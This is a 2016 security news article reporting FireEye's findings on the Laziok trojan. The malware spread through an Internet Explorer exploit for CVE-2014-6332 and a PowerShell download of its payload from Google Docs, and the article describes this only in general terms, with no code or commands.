Trojan Hits via PowerShell, Google Docs

Tuesday, April 26, 2016 @ 03:04 PM gHale


By taking advantage of Google Docs and PowerShell, a Trojan called Laziok is looking to gather and steal more information, researchers said.

Laziok ended up discovered last year when attackers used the malware going after energy companies in the Middle East. Attackers exploited an old Windows vulnerability to drop the Trojan onto users’ systems.

RELATED STORIES
Hack Attack Plan Thwarted
Aircraft Manufacturer Attacked
Security: Ease the Pain …
… Experts See ‘More of the Same’

Attackers found a way to bypass Google’s security checks and uploaded the malicious payload to Google Docs, said researchers at FireEye. The malware ended up uploaded in March and remained there until Google got the notification from FireEye.

“Users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning,” researchers said on a blog post. “After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.”

The operation started on the website of a Poland-based hosting service. The attack was initiated by loading obfuscated JavaScript code designed to exploit a Windows vulnerability tracked as CVE-2014-6332 and dubbed “Unicorn.”

When users accessed the attack page from Internet Explorer, the malicious script kicked in and allowed attackers to use an exploitation method known as “Godmode,” which allows code written in VBScript to break the browser sandbox.

The malicious script then leveraged PowerShell to download the actual malware from Google Docs and execute it.

“PowerShell is also useful for bypassing antivirus software because it is able to inject payloads directly in memory,” FireEye researchers said in the blog.

Once it infects a device, Trojan.Laziok collects information about the system, including a list of installed antiviruses.